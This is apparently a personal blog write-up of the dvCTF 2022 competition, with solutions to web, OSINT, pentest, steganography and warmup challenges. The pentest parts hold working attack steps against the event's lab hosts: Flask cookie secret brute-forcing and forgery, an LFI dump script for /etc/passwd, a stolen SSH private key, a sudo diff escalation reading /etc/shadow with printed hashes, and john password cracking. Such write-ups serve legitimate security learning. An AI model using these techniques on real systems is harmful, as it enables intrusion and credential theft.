dvCTF CTF 2022
Welcome to my blog! I’ve participated in this CTF by my own for team ISwearIGoogledIt and got some challenges! Limited time and couldn’t go over some of the guessy ones, but overall it was fun!
Challenge index:
Web
OSINT
Pentest
Misc
Warmup
Table of contents generated with md-toc
Web
CyberStreak v1.0
499 Easy
Hello,
I am a student and I would like to improve my web development skills. To practice, I am creating my first web application. This application is a kind of cybercoach. Example: you want to do sports. A sport goal could be to do 100 push-ups per day for 1 month. The application will allow you to create this “challenge” and each day, you will have to do the number of push-ups you have set and note it in the application. If you don’t do the push-ups for 3 days, it’s a failure and you lose your streak.
This first version of the application gives you the possibility to create an account and to do the challenge of the example.
Can you test the security of my application ?
xXx-michel-xXx
http://challs.dvc.tf:5001
Brute force is strictly forbidden and useless.
In the website we have a cookie:
eyJ1c2VybmFtZSI6Imthc2htaXI1NCJ9.YivC-A.5_iPn7HoiGYSz09owFk_MV3PpPE
//Decode base64
{"username":"kashmir54"}b+Â....±è.f.ÏOhÀY.Wsé<
Seems like flask cookie (it might look like a JWT due to the three parts separated by dots, but we can differenciate them since the first part is the payload in flask and on JWT is the header, so let’s use a great tool for these tasks flask-unsign:
flask-unsign --unsign --cookie 'eyJ1c2VybmFtZSI6Imthc2htaXI1NCJ9.Yiu_ug.2GRGxsYtvcTt59h_xKKCq5WXdcc'
[*] Session decodes to: {'username': 'kashmir54'}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[*] Attempted (2048): -----BEGIN PRIVATE KEY-----;r
[+] Found secret key after 15744 attemptsMVK6tLULz5FS
's3cr3t'
The admin might be xXx-michel-xXx as stated in the note of the challenge, so let’s use that username and sign the cookie with the obtained key:
kali@kali:~/Desktop/CTFs/dvCTF2022/Web$ flask-unsign --sign --cookie "{'username': 'xXx-michel-xXx'}" --secret 's3cr3t'
eyJ1c2VybmFtZSI6InhYeC1taWNoZWwteFh4In0.YivC3A.EJrqGZzwBNYqRuH04_ybjzMw_Xk
Use that cookie, reload the page and get the flag:
dvCTF{80b8d1A92G6a13a98Dc7b546a7a7Y35}
OSINT
Monkeey
50 Easy In what city is the statue of this monkey found? Wrap it around with the wrapper: dvCTF{city_in_lowercase}
We got this photo from the challenge:
Searching for the most characteristic parts of the photo and some keywords, we find this result:
Digging deep in the related images shows the name “king kong balls prague” and a quick search with that query confirmed us the city:
dvCTF{prague}
Elon Musk
120 Easy Hi,
I’m a huge fan of Elon Musk so I invested all my money in cryptocurrencies. However, I I got lost in the cryptoworld and I lost something, can you help me find it?
Sincerely,
@IL0veElon
So we have the following id, most probably is from Twitter: @IL0veElon
And it is IL0veElon twitter account
Scrolling on his tweets I found one that caught my attention Tweet:
099627400a565a0cc64c3a61ee0ce785d80dfbd30e1b1ea8bcb9fdd9952b9b8a
It seems like a transaction id or a public key for a cryptocurrency wallet or something, probably from $DOGE or $SHIB. I used most blockchain browsers such as Etherscan and blockchain.com but nothing showed up.
Going over the twitter account I double checked his bio and spotted a shy $EGLD among all the $DOGE $SHIB
Bio:
$DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $EGLD $DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $DOGE $SHIB $DOGE
So I went into a $EGLD network lookup and got the transaction. Down on the input data, we can see the flag:
dvCTF{Bl0cKcH4In_Rul3S}
Painting spot
461 Found a nice painting spot, took a picture of it. But I can’t remember where it is… The flag is in the form of dvCTF{} and has the flag wrapper already
We got the photo from the challenge:
I used exiftool for a sanity check and try my luck for it to have GPS information.
GPS Altitude Ref : Above Sea Level
GPS Speed Ref : km/h
GPS Speed : 0.07419386512
GPS Img Direction Ref : True North
GPS Img Direction : 227.9959872
GPS Dest Bearing Ref : True North
GPS Dest Bearing : 227.9959872
GPS Horizontal Positioning Error: 6.047869715 m
XP Title : Lugar para pintar
XP Comment : Óptimo local para pintar, deixei uma revisão positiva
XP Keywords : Pintura
These GPS Dest Bearing and GPS Img Direction are not very useful for the geolocation we want to achieve, and no further information about the location was found. Eventough, I found the XP comment which is written in portuguese, so maybe we can limit our search for countries where they speak portuguese.
Next step was to search the photo on Google images with aux text Portugal so the search prioritized images related with Portugal. I went for portugal first just to try. And we found a pretty similar image with that search query:
I went to the website with that photoand looking into more results of that google query, I could see that was on the Azores Island. We could keep looking for what is that place (easy, some results below the first image shows Islet of Vila Franca do Campo) but I came into adventure mode, open GMaps satelite and searched for that islet in the map going around Azores coast looking:
Until I found it here:
Using the Stree View this seems familiar on Praia do Corpo Santo. We have the rocks, the landscape and the green changing rooms with white walls:
Looking around, we can asume that the photo was taken from here since this is almost the one we had:
At this point we are looking for a Google review, since the comment on the exiftool said deixei uma revisão positiva “I left a positive review”. So maybe on the beach there is a review with the flag:
Sorted the reviews of the beach by date and got it:
dvCTF{g3o_sp0tt3d}
Welcome to the DaVinciCTF!
440
We get an image with post-its and opened websites:
- Post it 1: Binance elonmusk78@gmail.com Password01
Looking for reversing the Google ID, we see that his name is Semih Başar but this was a dead end. Also his password wasn’t working on binance.
- Post it 2: CTFd admin ThisIsAverySecurePassword
Nothing we could do with that. I don’t expect them to allow us to get as admin to the CTF platform.
- Post it 3: (Translate from french) Buy a Bitcoin Buy a DegenApe Become rich Prepare the CTF website
Another dead end, looked for the email or the username on degenape website and nothing.
- Ledger Recovery phrase note: We can see many words from a recovery phase. It could be from a ledger wallet or for Metamask, who knows.
minor casino able rare pretty stuff token embrace awake good infant crack news mix edge style this is not my private key sorry dude
As it says, might be another dead end since metamask phases are: 12, 15, 18, 21 or 24 words. Additionally, I wasn’t confident on the transcription due to the quality of the image, so I made a couple tries and skipped.
- On tabs: Binance FTX dvCTF GitHub DigitalOcean TradingView
Went over tradingview since I know they have a community and users, but no luck for elonmusk78. At this point I got stucked and decided to move on.
Here is where I missed the CTFd link. I completly skipped it since I thought that the admins did the photo on the go and were lazy to close that up, but on that specific path of the website you could find the flag.
Pentest
DaVinci’s Playlist : Part 1
497 Easy
Mr Vinci contacted a web developer to create a website with his favourite rap songs. But did he make it secure?
Website : http://challs.dvc.tf:51080
Ports : 51000-52000
So we have a simple website at port 51080 with two parameters to display some youtube videos depending the query:
Testing one of the parameters I came across a LFI on the playlistTop one:
With the following input I got the line 4 of the /etc/passwd file, so apparently the back end was opening a file with the path for the youtube link.
At some point of the HTML:
<!-- URL request: http://challs.dvc.tf:51080/?MyTop5=4&playlistTop=/etc/passwd -->
<iframe src="http://www.youtube.com/embed/sys:x:3:3:sys:/dev:/usr/sbin/nologin
" width="560" height="315" frameborder="0" allowfullscreen=""></iframe>
We also have SSRF (just in case)
challs.dvc.tf:51080/?MyTop5=4&playlistTop=http://webhook.site/2118ba7f-9487-472e-b9c0-bedbd3dbfd52
Ok, let’s get the complete set of users. Let’s speed things up with a little script:
import requests
import re
import time
lines = [i for i in range(1,50)]
target_file = []
for l in lines:
r = requests.get('http://challs.dvc.tf:51080/?MyTop5={}&playlistTop=/etc/passwd'.format(l))
target_line = re.findall(r'embed\/(.*)\n', r.text)
print(target_line[0])
target_file.append(target_line[0])
file_content = '\n'.join(target_file)
with open('output_file.txt', 'w') as out_file:
out_file.write(file_content)
Output:
kali@kali:~/Desktop/CTFs/dvCTF2022/Pentest$ python3 script.py
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:1000:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
leonardo:x:1001:1001::/home/leonardo:/bin/bash
administrator:x:1002:1002::/home/administrator:/bin/bash
Great, so we have users leonardo and administrator.
We could retrieve the ssh key for leonardo but the administrator got permission denied:
<!-- URL request: http://challs.dvc.tf:51080/?MyTop5=28&playlistTop=/home/leonardo/.ssh/id_rsa -->
<iframe src="http://www.youtube.com/embed/T2+dRDiuEEwITFfoqh+yPkS/gBvMcFiBCRYGku/Tz5h2BQK3KY1MOYNrtmtjJOEgtbPTcp
Use the previous script with the path for the ssh key /home/leonardo/.ssh/id_rsa and we got the key:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Let’s use it to access the machine. To do that, remember to append an empty line at the end of the key (to match the format) and change the permission to 600 for example (since greater permissions will stop the conection with SSL)
chmod 600 leo_rsa
ssh leonardo@138.68.106.171 -p 51022 -i leo_rsa
And we are in:
dvCTF{LF1_4nd_pR1V473_k3y}
DaVinci’s Playlist : Part 2/2.5
250 Medium
An unintended way to solve DaVinci’s Playlist : Part2 This challenge was reseted due to an unintended solution. This solution worked to retrieve both flags.
Looking to the txt files on the home directory we see:
leonardo@playlist:~$ ls
leonardo_flag.txt list.txt noteToAdministrator.txt
leonardo@playlist:~$ cat leonardo_flag.txt
dvCTF{LF1_4nd_pR1V473_k3y}
leonardo@playlist:~$ cat list.txt
US:
The Notorious B.I.G. - Juicy
Snoop Dogg - Who Am I
Kanye West - Diamonds From Sierra Leone
Outkast - Southernplayalisticadillacmuzik
Drake - War
FR:
Alpha Wann - ÇA VA ENSEMBLE
Freeze Corleone 667 - Freeze Raël
Alpha Wann - apdl
Lomepal - A ce soir
Paris c'est loin - Booba
leonardo@playlist:~$ cat noteToAdministrator.txt
Set yourself OneRule: For the administrator password, don't use stuff people know I like!!!
So maybe the administrator used the name of a song for his password? First I made some quick privesc checks:
leonardo@playlist:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
leonardo@playlist:/etc$ ls -la
-r--r----- 1 root root 755 Jan 20 2021 sudoers
drwxr-xr-x 1 root www-data 4096 Mar 11 15:30 sudoers.d
drwxr-xr-x 1 root root 4096 Mar 27 2019 supervisor
-rw-r--r-- 1 root root 1646 Mar 11 21:57 supervisord.conf
-rw-r--r-- 1 root root 2084 Sep 6 2015 sysctl.conf
drwxr-xr-x 1 root root 4096 Mar 27 2019 sysctl.d
drwxr-xr-x 1 root root 4096 Mar 27 2019 systemd
drwxr-xr-x 2 root root 4096 Dec 1 2017 terminfo
# We can see the sudoers.d owned by www-data... Suspicious
leonardo@playlist:/etc$ cd sudoers.d/
leonardo@playlist:/etc/sudoers.d$ ls
mysudoers README
leonardo@playlist:/etc/sudoers.d$ cat mysudoers
Defaults listpw=always
leonardo ALL=(root) NOPASSWD: /usr/bin/diff
leonardo@playlist:/etc/sudoers.d$
So we can use GTFOBin for diff, which will allow us to read any file with elevated privileges:
LFILE=/etc/shadow
sudo diff --line-format=%L /dev/null $LFILE
root:*:17501:0:99999:7:::
daemon:*:17501:0:99999:7:::
bin:*:17501:0:99999:7:::
sys:*:17501:0:99999:7:::
sync:*:17501:0:99999:7:::
games:*:17501:0:99999:7:::
man:*:17501:0:99999:7:::
lp:*:17501:0:99999:7:::
mail:*:17501:0:99999:7:::
news:*:17501:0:99999:7:::
uucp:*:17501:0:99999:7:::
proxy:*:17501:0:99999:7:::
www-data:*:17501:0:99999:7:::
backup:*:17501:0:99999:7:::
list:*:17501:0:99999:7:::
irc:*:17501:0:99999:7:::
gnats:*:17501:0:99999:7:::
nobody:*:17501:0:99999:7:::
systemd-timesync:*:17501:0:99999:7:::
systemd-network:*:17501:0:99999:7:::
systemd-resolve:*:17501:0:99999:7:::
systemd-bus-proxy:*:17501:0:99999:7:::
_apt:*:17501:0:99999:7:::
messagebus:*:17644:0:99999:7:::
sshd:*:19057:0:99999:7:::
leonardo:$6$5bUuHJiR$3CnUhwBhpeCK06DWN5OGl2UgC9gypTIgbERFdqfzFiK8PbWPkFGLAogdEWsMtknDE5Bvyt.L./IIl9/TTh47y/:19057:0:99999:7:::
administrator:$6$P41Sptrz$PbbsnwLLcrQnaLF2DpVZDvL9puMfvOHQHtjXPo1MW/mLqZxwsKZpSHNxxxijeYcVm62JzpyFGxmjEWfnoxfgT0:19057:0:99999:7:::
So we have the hashes for administrator, now move into cracking those hashes with song names. First, extract the content from the /etc/passwd and /etc/shadow files. The I used john for all this task:
unshadow passwd shadow > passwords
# Then I created a wordlist with all the song, authors on the list
# and also other historic references for other things such
# as da vinci paintings, things he liked, disliked, etc
john --wordlist=wordlist.txt passwords
I got no luck with that command, but with the following one we got the administrator flag. Going back into my steps, we cna go elevated privileges read, so looking at the leonardo_flag.txt I tried administrator_flag.txt, flag.txt and the last try succed: admin_flag.txt
leonardo@playlist:~$ LFILE=/home/administrator/admin_flag.txt
leonardo@playlist:~$ sudo diff --line-format=%L /dev/null $LFILE
dvCTF{763cbbc8f0f000830f4125645b587b9b}
dvCTF{763cbbc8f0f000830f4125645b587b9b}
The other solution was to take all the utility from the diff command with elevated privileges. Diff is intended for files, but the goal was to know if in the administrator or root directory had other stuff. Googling I found this post explaining how to use diff with directories, so with the following command, we could list the filenames within the administrator (on the root one there was nothing useful)
leonardo@playlist:~$ sudo diff /home/leonardo/ /home/administrator/
Only in /home/administrator/: a988d2ce35940a8a2e966892d342455d
Only in /home/administrator/: admin_flag.txt
Only in /home/leonardo/: leonardo_flag.txt
Only in /home/leonardo/: list.txt
Only in /home/leonardo/: noteToAdministrator.txt
Only in /home/leonardo/: .ssh
# That a988d2ce35940a8a2e966892d342455d file looks good
leonardo@playlist:~$ LFILE=/home/administrator/a988d2ce35940a8a2e966892d342455d
leonardo@playlist:~$ sudo diff --line-format=%L /dev/null $LFILE
dvCTF{f3d8e7963dad81d61515b58a327d9ad0}
And we got the flag:
dvCTF{f3d8e7963dad81d61515b58a327d9ad0}
Misc
Going postal
500 Medium OSINT Steganography
My dear friend “Bob” made a tool online to uncover the truth behind that map.
This is the map:
Some exiftools and binwalk over the photo didn’t showed anything, so I went for those vertial bars on google. I knew that some similar ones (postnet) are used in the letters and packages, but these ones are not align to a baseline. Then, I went to San Google with this query vertical bars codes postnet.
in this website I found great information:
So it seems like they are very common on Australia Post letters and packages, so with this query on Google I found that page “Bob” did as stated on the challenge description with this query auspost bar decoder:
Now grab some patience and input the letters corresponding with the bars in the image:
ASDFFDDADDAADAADFAFAFFDAFSFDAFASAFAAASADSAFDSDDDDDDDSSSDFFSDDADFAAS
We got on the website a code:
Valid barcode Format Control Code: 62 - Customer Barcode 3 Sorting Code: 78475110 Customer Information Field: V3K4N64r00
So at this point, didn’t know what to do with that. I tried to look up for that number 78475110 on Australia (since it seems like each street has a number) but didn’t work. Then I remembered that this challenge had the Stego tag, my good old friend -.-“
When for some recon on steghide, first tried with the password, and saw nothing. Then I went for it with no password and it showed a file within:
steghide info map.jpg
"map.jpg":
format: jpeg
capacity: 76.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "secretpwd.7z":
size: 758.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
I extracted the file and create a wordlist with some combinations for cracking the 7z password:
kali@kali:~/Desktop/CTFs/dvCTF2022/Misc$ steghide extract -sf map.jpg
Enter passphrase:
wrote extracted data to "secretpwd.7z".
kali@kali:~/Desktop/CTFs/dvCTF2022/Misc$ perl /usr/share/john/7z2john.pl secretpwd.7z > 7z.txt
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
kali@kali:~/Desktop/CTFs/dvCTF2022/Misc$ john --wordlist=passwords.txt 7z.txt
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 128/128 AVX 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 8 for all loaded hashes
Cost 3 (compression type) is 1 for all loaded hashes
Cost 4 (data length) is 664 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
6278475110V3K4N64r00 (secretpwd.7z)
1g 0:00:00:00 DONE (2022-03-13 08:57) 1.369g/s 21.91p/s 21.91c/s 21.91C/s V3K4N64r00..V3K4N64r00
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
In case you are curious about the wordlist, I used the keys obtained from the barcode:
V3K4N64r00
Bob
bob
BOB
78475110V3K4N64r00
6278475110V3K4N64r00
78475110
6278475110
v3k4n64r00
V3K4N64R00
VEKANGAROO
vekangaroo
62-78475110-V3K4N64r00
Then I extracted the 7z file and saw this directories within:
$ ls
1013:0000000000000000000000000000000000000000 1441:0011011000111001110000000111111001111000 1657:0011100001111000011111100111110111101100 1789:0011111111111111111111111111111111111100
1020:0011100000000110011111000111001000011100 1441:0011011111111001111100100111000110011100 1660:0011011000111001110000000111111001110000 1838:0011011001001001101100100110110110010000
1044:0011011000111110011111011000110000010000 1460:0011000111001001101100111110110000011100 1668:0011100001110001110000000000110001111100 1890:0011011110000110001100011000000001111100
1063:0011100001001111110010011001000111011100 1507:0011111111000000011111100111000000000000 1670:0000000000000000000000000000000000000000 1904:0011100001001111110011011001000110011100
1115:0011000000110000011111100001000001100000 1514:0011111110000110000000111111001000011100 1722:0011111110000110000000111111001000011100 1941:0011000001001000011100000110111000000000
1144:0011000111111001100011000001001001100000 1532:0011000111111000010011100110000110011000 1727:0011000001001000011100000110111000000000 1956:0011011110111000001111011000001000011100
1154:0011000111001001100100111100110000011100 1568:0011111111110000001100000000000111111100 1730:0011011000110110000000011001001111100000 1975:0011011100111100001111011000001000011100
1155:0011011111000111101101100011001110000000 1600:0011111111000000011111100111000000000000 1745:0011111111110000001100000000000111111100
1189:0011111111111111111111111111111111111100 1617:0011011111000111101100100001001110000000 1746:0011000000110000111111100001000001100000
1209:0000000000000000000000000000000000000000 1648:0011011011001001001100100100010010111000 1757:0000000000000000000000000000000000000000
1221:0011011111111101111100100111000010011100 1657:0011011110110000000011000000110110010000 1789:0011000111111000010011100100000010010000
At this point it was too much guess for my brain and prefered to do other challs.
The HackerMan
491 Easy OSINT Steganography
I found someone on social media, teasing a CTF he made but I couldn’t find out more. I think his pseudonym was “BornHackerMan”.
So running sherlock tool it showed that he has Twitter account.
There we can find some tweets, one video and a gif.
On the video we can see that it has captions, so I looked at them and said:
I finish my first CTF *hurray*
Find it at “hacker/[0-9]+/”
Signed: “The Hackerman”
Then, other tweet says:
Docker is such an amazing tool to build CTFs.
GitHub is also really usefull.
So probably he posted his CTF challenge in docker. Looking at that regex in the Find it at “hacker/[0-9]+/” and the DTMF dialing sounds at the start of the video made me feel close to the solution. So I grabbed the video from Twitter and used SonyVegas for isolating the video so I could input it on other tool rather than decoding the DTMF by ear…
Use this website to decode the wav file and showed that the followind numbers were dialed:
439804
Following the regex on the video I tried many things, but didn’t work:
hacker/439804/
https://hub.docker.com/r/hacker/439804/
I searched for other thehackerman, thehacker, hackerman… But no luck.
I missed that for just a slash… The solution was the following link and check the log files of the container. The regex was wrong, but I suppose that was my bad, try harder next time:
https://hub.docker.com/r/hacker439804/myfirstctf
Warmup
FrenchFlag
10 Forensic Can you find the data present in our flag ?
exiftool flag.png
ExifTool Version Number : 12.36
File Name : flag.png
File Modification Date/Time : 2022:03:11 14:41:00-05:00
File Access Date/Time : 2022:03:11 14:41:16-05:00
...
XMP Toolkit : Image::ExifTool 12.40
Creator : dvCTF{flagception}
Image Size : 1280x853
Megapixels : 1.1
dvCTF{flagception}
EBG13
10 Crypto We found this message : can you decipher it?
qiPGS{3apElcg1ba_1f_r4fl}
ROT 13
dvCTF{3ncRypt1on_1s_e4sy}
QmFzZTY0
10 Crypto
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll5U2tWVWJHaG9UVlZ3VlZacVFtRlRNbEpJVm10a1dHSkdjRTlaVjNSR1pVWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpYZHpGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm0weGIxSkdXbGRYYlVaclVqRmFTRll5TVRSVk1rcElaSHBHVjJFeVVYZFpla3BIWXpGT2RWVnRhRk5sYlhoWFZtMXdUMVF3TUhoalJscFlZbFZhY2xWcVFURlNNV1J5VjI1a1YwMUVSa1pWYkZKSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob1dGWnRNWGRVTVZGM1RVaG9hbEpzY0ZsWmJHaFRWMFpTVjJGRlRsTmlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKT2MyTkZaR2hTTW5oVVZGY3hiMkl4V1hoWGJFNVVUV3RzTkZVeWRHdFhSMHBJVld4c1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1V01VbzFWbXBKTVdFeFdYZE5WVlpUWWtkU1lWUlZXbUZOTVZweFUydDBWMVpyY0ZwWGExcDNWakZLVjJOSWJGZFdSVXBvVmtSS1QyTXlUa1poUjNCVFlYcFdXVlpYY0U5aU1rbDRWMWhvWVZKR1NsZFVWbFp6VGxaYVdFNVZPVmhTTUhCSlZsZDRjMWR0U2tkWGJXaGFUVlp3YUZwRlpGTlRSa3B5VGxaT2FWSnRPVE5XTW5oWFlqSkZlRmRZWkU1V1ZscFVXV3RrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0ROV2FrWkxWakpPU1dKR1pGZFNWWEJ2Vm10U1MxUXlUWGxVYTFwb1VqTkNWRmxyVm5kV1ZscDBaVWM1VWsxWFVucFdNV2h2VjBkS1JrNVdVbFZXTTJoSVZHeGFWMlJIVWtoa1IyaHBVbGhCZDFac1pEUmpNV1IwVTJ0a1dHSlhhR0ZVVmxwM1lVWndSbHBHVGxSU2EzQjVWR3hhVDJGV1NuUlBWRTVYVFc1b1dGbHFTa1psUm1SWldrVTFWMVpzY0ZWWFYzUnJWVEZzVjFWc1dsaGlWVnBQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt3V25kWFIwVjRZMFJPVjJGcldreFdNVnBIWTIxS1IxcEhiRmhTVlhCS1ZtMTBVMU14VlhoWFdHaFhZbXhhVmxsc1pHOVdSbEpZVGxjNVYxWnNjRWhYVkU1dllWVXhjbUpFVWxkTlYyaDJWakJrUzFKck5WZFdiRlpYVFRGS05sWkhkR0ZXYlZaWVZXdG9hMUp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGExZEhTbGhoUjBaVlZucFdkbFl3V25OT2JFcHpXa2R3YVZORlNrbFhWbFpyWXpGVmQwMUlhRk5oYkhCWVdWZDBkbVF4V2xWU2JGcHNVbTFTTVZVeWN6RlhSa3BaVVc1b1YxWjZRalJaYWtaYVpVWldjMkZGT1ZkaGVsWlFWa1phWVdReVZrZFdXR3hyVWtWS1dGUldXbmRsVm10M1YyNWtXRkl3VmpSWk1GSlBWMjFGZVZWclpHRldNMmhJV1RJeFMxSXlSa2RoUmxKVFZsaENTMVp0TVRCVk1VMTRWbGhvV0ZkSGFGbFpiWGhoVm14c2NscEhPV3BTYkhCNFZrY3dOV0V5U2tkalJXaFhZbFJCTVZaWGMzaFhSbFoxWTBaa1RsWXlhREpXYWtKclV6RktjazVXWkZaaVJscFlXV3hhUm1ReFduRlNiVVpYVFd4S1NWWlhkRzloTVVwMFZXczVWMkZyV2t4Vk1uaHJWakZhZEZKdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp0ZUhkTk1YQllaVWhLYkZZeFdrbGFSV1F3VlR